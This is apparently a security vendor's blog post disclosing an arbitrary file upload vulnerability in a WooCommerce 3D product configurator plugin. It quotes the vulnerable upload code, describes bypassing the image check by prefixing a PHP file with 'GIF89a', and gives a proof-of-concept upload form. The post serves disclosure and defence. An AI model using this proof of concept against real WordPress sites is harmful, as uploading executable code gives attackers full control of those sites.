19 Dec

Our Proactive Monitoring Caught an Arbitrary File Upload Vulnerability Being Introduced In To a Plugin That Works With WooCommerce

One of the ways we help to improve the security of WordPress plugins, not just for our customers, but for everyone using them, is the proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities. Through that we just caught one of the most likely to be exploited types of vulnerabilities being introduced in to a plugin. That being an arbitrary file upload vulnerability, which provides hackers with an easy way of gaining complete access to a website since they can upload a file with whatever malicious code they want and then cause that to run. The plugin itself, 3D Product configurator for WooCommerce, isn’t popular, with “Fewer than 10” installations according to wordpress.org, but in yet another reminder that those using WooCommerce need to be concerned about the security of any plugins they use with that, this is yet another WooCommerce tied plugin we have recently found a fairly serious security issue with.

This vulnerability is yet another good reason to check plugins you use through our Plugin Security Checker since it can alert you if plugins you use possibly contain a similar issue (and possibly contain a lot of other serious vulnerabilities). From there if you are a paying customer of our service you can suggest/vote for it to receive a security review that will check over that or you can order the same type of review separately.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.

Technical Details

In version 1.5.4 of the plugin a new file upload.php was added to the plugin. Code in that file will move a file sent with a request to a location specified by “$targetDirectory . $newName . ‘.’ . $imageFileType”:

if ( move_uploaded_file( $_FILES['image']['tmp_name'], $targetDirectory . $newName . '.' . $imageFileType ) ) {

The first part of that sets it to be in the directory “/wp-content/uploads/expivi/”:

$targetDirectory = __DIR__ . '/../../uploads/expivi/';

The second part is generated by the time of the upload:

$newName = sha1( microtime() . $_FILES['image']['name'] );

A hacker could figure that out, but they don’t have to because upon a successful upload that value is returned in response to the request:

echo json_encode( [
	'status' => 200,
	'result' => '//' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . '?id=' . $newName
] );

The final part is just the file extension of the file being uploaded:

$imageFileType = strtolower( pathinfo( $_FILES['image']['name'], PATHINFO_EXTENSION ) );

The only restriction on what can be uploaded is that it has return some value other than “false” when passed through the PHP function “getimagesize()”:

$check = getimagesize( $_FILES['image']['tmp_name'] );
if ( $check !== false ) {

If that was intended to prevent uploading non-images files, it isn’t effective. A quick search showed us that a .php file can return a value other than “false” by simply appending “GIF89a” to the beginning of its contents.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/expivi/ with a file name specified in the response to the request.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-content/plugins/expivi/upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="image" />
<input type="submit" value="Submit" />

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service you can suggest/vote for the plugins you use to receive a security review from us. You can start using the service for free when you sign up now.